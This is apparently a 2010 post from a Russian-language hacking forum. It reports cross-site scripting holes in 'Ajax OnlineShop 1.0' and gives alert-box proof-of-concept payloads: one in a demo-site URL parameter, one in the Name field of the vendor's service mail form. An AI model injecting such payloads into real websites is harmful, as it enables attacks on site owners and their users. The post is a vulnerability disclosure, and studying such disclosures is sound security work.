Показать сообщение отдельно

  #437  
Старый 19.11.2010, 14:13
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами: 8456812

Репутация: 55
По умолчанию

Дополнение к посту от 547

Ajax OnlineShop 1.0

Xss

офф-демо-сайт

Код:
http://www.ajax-onlineshop.de/demo/index.php?id=1">alert('d0s')
+xss на офф.сайте

Код:
http://www.ajax-onlineshop.de/servicemail/
Заполняем все поля,уязвимое поле - Name

Вбиваем туда что-нибудь типо

[CODE]
">alert(1)
 
Ответить с цитированием